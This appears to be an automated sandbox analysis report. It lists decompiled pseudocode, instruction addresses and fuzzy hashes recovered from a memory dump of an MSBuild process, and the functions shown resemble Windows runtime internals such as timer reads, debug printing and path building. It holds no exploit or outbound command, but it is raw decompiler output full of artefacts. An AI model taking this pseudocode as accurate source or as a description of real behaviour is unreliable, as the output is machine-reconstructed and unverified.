                                            0x01085270
                                            0x010851fc
                                            0x010851fd
                                            0x01085202
                                            0x01085203
                                            0x01085205
                                            0x0108520a
                                            0x0108520f
                                            0x00000000
                                            0x00000000
                                            0x0108521b
                                            0x01085226
                                            0x0108522b
                                            0x0108521d
                                            0x0108521d
                                            0x01085222
                                            0x01085222
                                            0x0108522d
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: dd38d00273dc9e4846601a8e58b33d1cfe9b9b423e95ec0ff45a779265a88b48
                                            • Instruction ID: be6648be8b8998535284e09af09f47121df1486d6279f4a48fa250dd27ca2722
                                            • Opcode Fuzzy Hash: dd38d00273dc9e4846601a8e58b33d1cfe9b9b423e95ec0ff45a779265a88b48
                                            • Instruction Fuzzy Hash: AA516FB1A046199FDB25EFA9CC40BAEBBF8FB48700F14806DE5C9EB251DB719941CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E0102B944(signed int* __ecx, char __edx) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				char _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				signed int* _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr _v72;
                                            				intOrPtr _v76;
                                            				char _v77;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t65;
                                            				intOrPtr _t67;
                                            				intOrPtr _t68;
                                            				char* _t73;
                                            				intOrPtr _t77;
                                            				intOrPtr _t78;
                                            				signed int _t82;
                                            				intOrPtr _t83;
                                            				void* _t87;
                                            				char _t88;
                                            				intOrPtr* _t89;
                                            				intOrPtr _t91;
                                            				void* _t97;
                                            				intOrPtr _t100;
                                            				void* _t102;
                                            				void* _t107;
                                            				signed int _t108;
                                            				intOrPtr* _t112;
                                            				void* _t113;
                                            				intOrPtr* _t114;
                                            				intOrPtr _t115;
                                            				intOrPtr _t116;
                                            				intOrPtr _t117;
                                            				signed int _t118;
                                            				void* _t130;
                                            
                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                            				_v8 =  *0x10fd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                            				_t112 = __ecx;
                                            				_v77 = __edx;
                                            				_v48 = __ecx;
                                            				_v28 = 0;
                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                            				_t105 =  *_t5;
                                            				_v20 = 0;
                                            				_v16 = 0;
                                            				if(_t105 == 0) {
                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                            					_t60 =  *__ecx |  *_t50;
                                            					if(( *__ecx |  *_t50) != 0) {
                                            						 *__ecx = 0;
                                            						__ecx[1] = 0;
                                            						if(E01027D50() != 0) {
                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t65 = 0x7ffe0386;
                                            						}
                                            						if( *_t65 != 0) {
                                            							E010D8CD6(_t112);
                                            						}
                                            						_push(0);
                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t52);
                                            						_t60 = E01049E20();
                                            					}
                                            					L20:
                                            					_pop(_t107);
                                            					_pop(_t113);
                                            					_pop(_t87);
                                            					return E0104B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                            				}
                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                            				_t67 =  *_t8;
                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                            				_t108 =  *(_t67 + 0x14);
                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                            				_t105 = 0x2710;
                                            				asm("sbb eax, edi");
                                            				_v44 = _t88;
                                            				_v52 = _t108;
                                            				_t60 = E0104CE00(_t97, _t68, 0x2710, 0);
                                            				_v56 = _t60;
                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                            					L3:
                                            					 *(_t112 + 0x44) = _t60;
                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                            					 *_t112 = _t88;
                                            					 *(_t112 + 4) = _t108;
                                            					_v20 = _t60 * 0x2710;
                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                            					if(_v77 != 0) {
                                            						L16:
                                            						_v36 = _t88;
                                            						_v32 = _t108;
                                            						if(E01027D50() != 0) {
                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            						} else {
                                            							_t73 = 0x7ffe0386;
                                            						}
                                            						if( *_t73 != 0) {
                                            							_t105 = _v40;
                                            							E010D8F6A(_t112, _v40, _t88, _t108);
                                            						}
                                            						_push( &_v28);
                                            						_push(0);
                                            						_push( &_v36);
                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                            						_push( *_t48);
                                            						_t60 = E0104AF60();
                                            						goto L20;
                                            					} else {
                                            						_t89 = 0x7ffe03b0;
                                            						do {
                                            							_t114 = 0x7ffe0010;
                                            							do {
                                            								_t77 =  *0x10f8628; // 0x0
                                            								_v68 = _t77;
                                            								_t78 =  *0x10f862c; // 0x0
                                            								_v64 = _t78;
                                            								_v72 =  *_t89;
                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                            								while(1) {
                                            									_t105 =  *0x7ffe000c;
                                            									_t100 =  *0x7ffe0008;
                                            									if(_t105 ==  *_t114) {
                                            										goto L8;
                                            									}
                                            									asm("pause");
                                            								}
                                            								L8:
                                            								_t89 = 0x7ffe03b0;
                                            								_t115 =  *0x7ffe03b0;
                                            								_t82 =  *0x7FFE03B4;
                                            								_v60 = _t115;
                                            								_t114 = 0x7ffe0010;
                                            								_v56 = _t82;
                                            							} while (_v72 != _t115 || _v76 != _t82);
                                            							_t83 =  *0x10f8628; // 0x0
                                            							_t116 =  *0x10f862c; // 0x0
                                            							_v76 = _t116;
                                            							_t117 = _v68;
                                            						} while (_t117 != _t83 || _v64 != _v76);
                                            						asm("sbb edx, [esp+0x24]");
                                            						_t102 = _t100 - _v60 - _t117;
                                            						_t112 = _v48;
                                            						_t91 = _v44;
                                            						asm("sbb edx, eax");
                                            						_t130 = _t105 - _v52;
                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                            							_t88 = _t102 - _t91;
                                            							asm("sbb edx, edi");
                                            							_t108 = _t105;
                                            						} else {
                                            							_t88 = 0;
                                            							_t108 = 0;
                                            						}
                                            						goto L16;
                                            					}
                                            				} else {
                                            					if( *(_t112 + 0x44) == _t60) {
                                            						goto L20;
                                            					}
                                            					goto L3;
                                            				}
                                            			}
















































                                            0x0102b94c
                                            0x0102b956
                                            0x0102b95c
                                            0x0102b95e
                                            0x0102b964
                                            0x0102b969
                                            0x0102b96d
                                            0x0102b96d
                                            0x0102b970
                                            0x0102b974
                                            0x0102b97a
                                            0x0102badf
                                            0x0102badf
                                            0x0102bae2
                                            0x0102bae4
                                            0x0102bae6
                                            0x0102baf0
                                            0x01072cb8
                                            0x0102baf6
                                            0x0102baf6
                                            0x0102baf6
                                            0x0102bafd
                                            0x0102bb1f
                                            0x0102bb1f
                                            0x0102baff
                                            0x0102bb00
                                            0x0102bb00
                                            0x0102bb03
                                            0x0102bb03
                                            0x0102bacb
                                            0x0102bacf
                                            0x0102bad0
                                            0x0102bad1
                                            0x0102badc
                                            0x0102badc
                                            0x0102b980
                                            0x0102b980
                                            0x0102b988
                                            0x0102b98b
                                            0x0102b98d
                                            0x0102b990
                                            0x0102b993
                                            0x0102b999
                                            0x0102b99b
                                            0x0102b9a1
                                            0x0102b9a5
                                            0x0102b9aa
                                            0x0102b9b0
                                            0x0102b9bb
                                            0x0102b9c0
                                            0x0102b9c3
                                            0x0102b9ca
                                            0x0102b9cc
                                            0x0102b9cf
                                            0x0102b9d3
                                            0x0102b9d7
                                            0x0102ba94
                                            0x0102ba94
                                            0x0102ba98
                                            0x0102baa3
                                            0x01072ccb
                                            0x0102baa9
                                            0x0102baa9
                                            0x0102baa9
                                            0x0102bab1
                                            0x01072cd5
                                            0x01072cdd
                                            0x01072cdd
                                            0x0102babb
                                            0x0102babc
                                            0x0102bac2
                                            0x0102bac3
                                            0x0102bac3
                                            0x0102bac6
                                            0x00000000
                                            0x0102b9dd
                                            0x0102b9dd
                                            0x0102b9e7
                                            0x0102b9e7
                                            0x0102b9ec
                                            0x0102b9ec
                                            0x0102b9f1
                                            0x0102b9f5
                                            0x0102b9fa
                                            0x0102ba00
                                            0x0102ba0c
                                            0x0102ba10
                                            0x0102ba10
                                            0x0102ba12
                                            0x0102ba18
                                            0x00000000
                                            0x00000000
                                            0x0102bb26
                                            0x0102bb26
                                            0x0102ba1e
                                            0x0102ba1e
                                            0x0102ba23
                                            0x0102ba25
                                            0x0102ba2c
                                            0x0102ba30
                                            0x0102ba35
                                            0x0102ba35
                                            0x0102ba41
                                            0x0102ba46
                                            0x0102ba4c
                                            0x0102ba50
                                            0x0102ba54
                                            0x0102ba6a
                                            0x0102ba6e
                                            0x0102ba70
                                            0x0102ba74
                                            0x0102ba78
                                            0x0102ba7a
                                            0x0102ba7c
                                            0x0102ba8e
                                            0x0102ba90
                                            0x0102ba92
                                            0x0102bb14
                                            0x0102bb14
                                            0x0102bb16
                                            0x0102bb16
                                            0x00000000
                                            0x0102ba7c
                                            0x0102bb0a
                                            0x0102bb0d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102bb0f

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0102B9A5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID:
                                            • API String ID: 885266447-0
                                            • Opcode ID: bc1de9feee39f10db14ab258a06908fe47ee931484e3e71ad7c85c3b63620761
                                            • Instruction ID: d314379b70715c2d2c81566c70ee795217140bf8c317913ccd99ed63940d72e6
                                            • Opcode Fuzzy Hash: bc1de9feee39f10db14ab258a06908fe47ee931484e3e71ad7c85c3b63620761
                                            • Instruction Fuzzy Hash: 82515871A08311CFC721DF2DC48092ABBF5FB88600F1489AEEAC587355D771E844CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E0100B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                            				signed int _t65;
                                            				signed short _t69;
                                            				intOrPtr _t70;
                                            				signed short _t85;
                                            				void* _t86;
                                            				signed short _t89;
                                            				signed short _t91;
                                            				intOrPtr _t92;
                                            				intOrPtr _t97;
                                            				intOrPtr* _t98;
                                            				signed short _t99;
                                            				signed short _t101;
                                            				void* _t102;
                                            				char* _t103;
                                            				signed short _t104;
                                            				intOrPtr* _t110;
                                            				void* _t111;
                                            				void* _t114;
                                            				intOrPtr* _t115;
                                            
                                            				_t109 = __esi;
                                            				_t108 = __edi;
                                            				_t106 = __edx;
                                            				_t95 = __ebx;
                                            				_push(0x90);
                                            				_push(0x10df7a8);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                            				if(__edx == 0xffffffff) {
                                            					L6:
                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                            					__eflags = _t65 & 0x00000002;
                                            					if((_t65 & 0x00000002) != 0) {
                                            						L3:
                                            						L4:
                                            						return E0105D130(_t95, _t108, _t109);
                                            					}
                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                            					_t108 = 0;
                                            					_t109 = 0;
                                            					_t95 = 0;
                                            					__eflags = 0;
                                            					while(1) {
                                            						__eflags = _t95 - 0x200;
                                            						if(_t95 >= 0x200) {
                                            							break;
                                            						}
                                            						E0104D000(0x80);
                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                            						_t108 = _t115;
                                            						_t95 = _t95 - 0xffffff80;
                                            						_t17 = _t114 - 4;
                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                            						__eflags =  *_t17;
                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                            						_t102 = _t110 + 1;
                                            						do {
                                            							_t85 =  *_t110;
                                            							_t110 = _t110 + 1;
                                            							__eflags = _t85;
                                            						} while (_t85 != 0);
                                            						_t111 = _t110 - _t102;
                                            						_t21 = _t95 - 1; // -129
                                            						_t86 = _t21;
                                            						__eflags = _t111 - _t86;
                                            						if(_t111 > _t86) {
                                            							_t111 = _t86;
                                            						}
                                            						E0104F3E0(_t108, _t106, _t111);
                                            						_t115 = _t115 + 0xc;
                                            						_t103 = _t111 + _t108;
                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                            						_t89 = _t95 - _t111;
                                            						__eflags = _t89;
                                            						_push(0);
                                            						if(_t89 == 0) {
                                            							L15:
                                            							_t109 = 0xc000000d;
                                            							goto L16;
                                            						} else {
                                            							__eflags = _t89 - 0x7fffffff;
                                            							if(_t89 <= 0x7fffffff) {
                                            								L16:
                                            								 *(_t114 - 0x94) = _t109;
                                            								__eflags = _t109;
                                            								if(_t109 < 0) {
                                            									__eflags = _t89;
                                            									if(_t89 != 0) {
                                            										 *_t103 = 0;
                                            									}
                                            									L26:
                                            									 *(_t114 - 0xa0) = _t109;
                                            									 *(_t114 - 4) = 0xfffffffe;
                                            									__eflags = _t109;
                                            									if(_t109 >= 0) {
                                            										L31:
                                            										_t98 = _t108;
                                            										_t39 = _t98 + 1; // 0x1
                                            										_t106 = _t39;
                                            										do {
                                            											_t69 =  *_t98;
                                            											_t98 = _t98 + 1;
                                            											__eflags = _t69;
                                            										} while (_t69 != 0);
                                            										_t99 = _t98 - _t106;
                                            										__eflags = _t99;
                                            										L34:
                                            										_t70 =  *[fs:0x30];
                                            										__eflags =  *((char*)(_t70 + 2));
                                            										if( *((char*)(_t70 + 2)) != 0) {
                                            											L40:
                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                            											 *(_t114 - 4) = 1;
                                            											_push(_t114 - 0x74);
                                            											L0105DEF0(_t99, _t106);
                                            											 *(_t114 - 4) = 0xfffffffe;
                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            											goto L3;
                                            										}
                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                            											goto L40;
                                            										}
                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                            										_push(_t99 & 0x0000ffff);
                                            										_push(_t108);
                                            										_push(1);
                                            										_t101 = E0104B280();
                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                            											__eflags = _t101 - 0x80000003;
                                            											if(_t101 == 0x80000003) {
                                            												E0104B7E0(1);
                                            												_t101 = 0;
                                            												__eflags = 0;
                                            											}
                                            										}
                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                            										goto L4;
                                            									}
                                            									__eflags = _t109 - 0x80000005;
                                            									if(_t109 == 0x80000005) {
                                            										continue;
                                            									}
                                            									break;
                                            								}
                                            								 *(_t114 - 0x90) = 0;
                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                            								_t91 = E0104E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                            								_t115 = _t115 + 0x10;
                                            								_t104 = _t91;
                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                            								__eflags = _t104;
                                            								if(_t104 < 0) {
                                            									L21:
                                            									_t109 = 0x80000005;
                                            									 *(_t114 - 0x90) = 0x80000005;
                                            									L22:
                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                            									L23:
                                            									 *(_t114 - 0x94) = _t109;
                                            									goto L26;
                                            								}
                                            								__eflags = _t104 - _t92;
                                            								if(__eflags > 0) {
                                            									goto L21;
                                            								}
                                            								if(__eflags == 0) {
                                            									goto L22;
                                            								}
                                            								goto L23;
                                            							}
                                            							goto L15;
                                            						}
                                            					}
                                            					__eflags = _t109;
                                            					if(_t109 >= 0) {
                                            						goto L31;
                                            					}
                                            					__eflags = _t109 - 0x80000005;
                                            					if(_t109 != 0x80000005) {
                                            						goto L31;
                                            					}
                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                            					_t38 = _t95 - 1; // -129
                                            					_t99 = _t38;
                                            					goto L34;
                                            				}
                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                            					__eflags = __edx - 0x65;
                                            					if(__edx != 0x65) {
                                            						goto L2;
                                            					}
                                            					goto L6;
                                            				}
                                            				L2:
                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                            				_push(_t106);
                                            				if(E0104A890() != 0) {
                                            					goto L6;
                                            				}
                                            				goto L3;
                                            			}






















                                            0x0100b171
                                            0x0100b171
                                            0x0100b171
                                            0x0100b171
                                            0x0100b171
                                            0x0100b176
                                            0x0100b17b
                                            0x0100b180
                                            0x0100b186
                                            0x0100b18f
                                            0x0100b198
                                            0x0100b1a4
                                            0x0100b1aa
                                            0x01064802
                                            0x01064802
                                            0x01064805
                                            0x0106480c
                                            0x0106480e
                                            0x0100b1d1
                                            0x0100b1d3
                                            0x0100b1de
                                            0x0100b1de
                                            0x01064817
                                            0x0106481e
                                            0x01064820
                                            0x01064822
                                            0x01064822
                                            0x01064824
                                            0x01064824
                                            0x0106482a
                                            0x00000000
                                            0x00000000
                                            0x01064835
                                            0x0106483a
                                            0x0106483d
                                            0x0106483f
                                            0x01064842
                                            0x01064842
                                            0x01064842
                                            0x01064846
                                            0x0106484c
                                            0x0106484e
                                            0x01064851
                                            0x01064851
                                            0x01064853
                                            0x01064854
                                            0x01064854
                                            0x01064858
                                            0x0106485a
                                            0x0106485a
                                            0x0106485d
                                            0x0106485f
                                            0x01064861
                                            0x01064861
                                            0x01064866
                                            0x0106486b
                                            0x0106486e
                                            0x01064871
                                            0x01064876
                                            0x01064876
                                            0x01064878
                                            0x0106487b
                                            0x01064884
                                            0x01064884
                                            0x00000000
                                            0x0106487d
                                            0x0106487d
                                            0x01064882
                                            0x01064889
                                            0x01064889
                                            0x0106488f
                                            0x01064891
                                            0x010648e0
                                            0x010648e2
                                            0x010648e4
                                            0x010648e4
                                            0x010648e7
                                            0x010648e7
                                            0x010648ed
                                            0x010648f4
                                            0x010648f6
                                            0x01064951
                                            0x01064951
                                            0x01064953
                                            0x01064953
                                            0x01064956
                                            0x01064956
                                            0x01064958
                                            0x01064959
                                            0x01064959
                                            0x0106495d
                                            0x0106495d
                                            0x0106495f
                                            0x0106495f
                                            0x01064965
                                            0x01064969
                                            0x010649ba
                                            0x010649ba
                                            0x010649c1
                                            0x010649c5
                                            0x010649cc
                                            0x010649d4
                                            0x010649d7
                                            0x010649da
                                            0x010649e4
                                            0x010649e5
                                            0x010649f3
                                            0x01064a02
                                            0x00000000
                                            0x01064a02
                                            0x01064972
                                            0x01064974
                                            0x00000000
                                            0x00000000
                                            0x01064976
                                            0x01064979
                                            0x01064982
                                            0x01064983
                                            0x01064984
                                            0x0106498b
                                            0x0106498d
                                            0x01064991
                                            0x01064993
                                            0x01064999
                                            0x0106499d
                                            0x010649a2
                                            0x010649a2
                                            0x010649a2
                                            0x01064999
                                            0x010649ac
                                            0x00000000
                                            0x010649b3
                                            0x010648f8
                                            0x010648fe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010648fe
                                            0x01064895
                                            0x0106489c
                                            0x010648ad
                                            0x010648b2
                                            0x010648b5
                                            0x010648b7
                                            0x010648ba
                                            0x010648bc
                                            0x010648c6
                                            0x010648c6
                                            0x010648cb
                                            0x010648d1
                                            0x010648d4
                                            0x010648d8
                                            0x010648d8
                                            0x00000000
                                            0x010648d8
                                            0x010648be
                                            0x010648c0
                                            0x00000000
                                            0x00000000
                                            0x010648c2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010648c4
                                            0x00000000
                                            0x01064882
                                            0x0106487b
                                            0x01064904
                                            0x01064906
                                            0x00000000
                                            0x00000000
                                            0x01064908
                                            0x0106490e
                                            0x00000000
                                            0x00000000
                                            0x01064910
                                            0x01064917
                                            0x01064917
                                            0x00000000
                                            0x01064917
                                            0x0100b1ba
                                            0x010647f9
                                            0x010647fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010647fc
                                            0x0100b1c0
                                            0x0100b1c0
                                            0x0100b1c3
                                            0x0100b1cb
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: _vswprintf_s
                                            • String ID:
                                            • API String ID: 677850445-0
                                            • Opcode ID: 95d697d0cc84f697d717cf9526aca1e682190a66ad008913b096907bef2503ba
                                            • Instruction ID: e69e7ba9eb7f981db02945e0c08726d37caebfb3343770d7d89c191a00f6d525
                                            • Opcode Fuzzy Hash: 95d697d0cc84f697d717cf9526aca1e682190a66ad008913b096907bef2503ba
                                            • Instruction Fuzzy Hash: 4151DF71D0025A8FEB66CF688844BEEBBF4BF00710F1041A9D899EB282D7754945CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E01032581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200319, char _a1546911999) {
                                            				signed int _v8;
                                            				signed int _v16;
                                            				unsigned int _v24;
                                            				void* _v28;
                                            				signed int _v32;
                                            				unsigned int _v36;
                                            				signed int _v37;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				intOrPtr _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _t237;
                                            				signed int _t241;
                                            				void* _t245;
                                            				void* _t246;
                                            				signed int _t251;
                                            				signed int _t253;
                                            				intOrPtr _t255;
                                            				signed int _t258;
                                            				signed int _t265;
                                            				signed int _t268;
                                            				signed int _t276;
                                            				signed int _t282;
                                            				signed int _t284;
                                            				intOrPtr* _t286;
                                            				signed int _t287;
                                            				unsigned int _t290;
                                            				signed int _t294;
                                            				intOrPtr* _t295;
                                            				signed int _t296;
                                            				signed int _t300;
                                            				intOrPtr _t312;
                                            				signed int _t321;
                                            				signed int _t323;
                                            				signed int _t324;
                                            				signed int _t328;
                                            				signed int _t329;
                                            				void* _t331;
                                            				signed int _t332;
                                            				signed int _t334;
                                            				signed int _t337;
                                            				void* _t338;
                                            				void* _t340;
                                            
                                            				_t334 = _t337;
                                            				_t338 = _t337 - 0x4c;
                                            				_v8 =  *0x10fd360 ^ _t334;
                                            				_push(__ebx);
                                            				_push(__esi);
                                            				_push(__edi);
                                            				_t328 = 0x10fb2e8;
                                            				_v56 = _a4;
                                            				_v48 = __edx;
                                            				_v60 = __ecx;
                                            				_t290 = 0;
                                            				_v80 = 0;
                                            				asm("movsd");
                                            				_v64 = 0;
                                            				_v76 = 0;
                                            				_v72 = 0;
                                            				asm("movsd");
                                            				_v44 = 0;
                                            				_v52 = 0;
                                            				_v68 = 0;
                                            				asm("movsd");
                                            				_v32 = 0;
                                            				_v36 = 0;
                                            				asm("movsd");
                                            				_v16 = 0;
                                            				_t282 = 0x48;
                                            				_t310 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                            				_t321 = 0;
                                            				_v37 = _t310;
                                            				if(_v48 <= 0) {
                                            					L16:
                                            					_t45 = _t282 - 0x48; // 0x0
                                            					__eflags = _t45 - 0xfffe;
                                            					if(_t45 > 0xfffe) {
                                            						_t329 = 0xc0000106;
                                            						goto L32;
                                            					} else {
                                            						_t328 = L01024620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
                                            						_v52 = _t328;
                                            						__eflags = _t328;
                                            						if(_t328 == 0) {
                                            							_t329 = 0xc0000017;
                                            							goto L32;
                                            						} else {
                                            							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                            							_t50 = _t328 + 0x48; // 0x48
                                            							_t323 = _t50;
                                            							_t310 = _v32;
                                            							 *(_t328 + 0x3c) = _t282;
                                            							_t284 = 0;
                                            							 *((short*)(_t328 + 0x30)) = _v48;
                                            							__eflags = _t310;
                                            							if(_t310 != 0) {
                                            								 *(_t328 + 0x18) = _t323;
                                            								__eflags = _t310 - 0x10f8478;
                                            								 *_t328 = ((0 | _t310 == 0x010f8478) - 0x00000001 & 0xfffffffb) + 7;
                                            								E0104F3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
                                            								_t310 = _v32;
                                            								_t338 = _t338 + 0xc;
                                            								_t284 = 1;
                                            								__eflags = _a8;
                                            								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
                                            								if(_a8 != 0) {
                                            									_t276 = E010939F2(_t323);
                                            									_t310 = _v32;
                                            									_t323 = _t276;
                                            								}
                                            							}
                                            							_t294 = 0;
                                            							_v16 = 0;
                                            							__eflags = _v48;
                                            							if(_v48 <= 0) {
                                            								L31:
                                            								_t329 = _v68;
                                            								__eflags = 0;
                                            								 *((short*)(_t323 - 2)) = 0;
                                            								goto L32;
                                            							} else {
                                            								_t282 = _t328 + _t284 * 4;
                                            								_v56 = _t282;
                                            								do {
                                            									__eflags = _t310;
                                            									if(_t310 != 0) {
                                            										_t237 =  *(_v60 + _t294 * 4);
                                            										__eflags = _t237;
                                            										if(_t237 == 0) {
                                            											goto L30;
                                            										} else {
                                            											__eflags = _t237 == 5;
                                            											if(_t237 == 5) {
                                            												goto L30;
                                            											} else {
                                            												goto L22;
                                            											}
                                            										}
                                            									} else {
                                            										L22:
                                            										 *_t282 =  *(_v60 + _t294 * 4);
                                            										 *(_t282 + 0x18) = _t323;
                                            										_t241 =  *(_v60 + _t294 * 4);
                                            										__eflags = _t241 - 8;
                                            										if(_t241 > 8) {
                                            											goto L56;
                                            										} else {
                                            											switch( *((intOrPtr*)(_t241 * 4 +  &M01032959))) {
                                            												case 0:
                                            													__ax =  *0x10f8488;
                                            													__eflags = __ax;
                                            													if(__ax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__ax & 0x0000ffff = E0104F3E0(__edi,  *0x10f848c, __ax & 0x0000ffff);
                                            														__eax =  *0x10f8488 & 0x0000ffff;
                                            														goto L26;
                                            													}
                                            													goto L108;
                                            												case 1:
                                            													L45:
                                            													E0104F3E0(_t323, _v80, _v64);
                                            													_t271 = _v64;
                                            													goto L26;
                                            												case 2:
                                            													 *0x10f8480 & 0x0000ffff = E0104F3E0(__edi,  *0x10f8484,  *0x10f8480 & 0x0000ffff);
                                            													__eax =  *0x10f8480 & 0x0000ffff;
                                            													__eax = ( *0x10f8480 & 0x0000ffff) >> 1;
                                            													__edi = __edi + __eax * 2;
                                            													goto L28;
                                            												case 3:
                                            													__eax = _v44;
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														goto L29;
                                            													} else {
                                            														__esi = __eax + __eax;
                                            														__eax = E0104F3E0(__edi, _v72, __esi);
                                            														__edi = __edi + __esi;
                                            														__esi = _v52;
                                            														goto L27;
                                            													}
                                            													goto L108;
                                            												case 4:
                                            													_push(0x2e);
                                            													_pop(__eax);
                                            													 *(__esi + 0x44) = __edi;
                                            													 *__edi = __ax;
                                            													__edi = __edi + 4;
                                            													_push(0x3b);
                                            													_pop(__eax);
                                            													 *(__edi - 2) = __ax;
                                            													goto L29;
                                            												case 5:
                                            													__eflags = _v36;
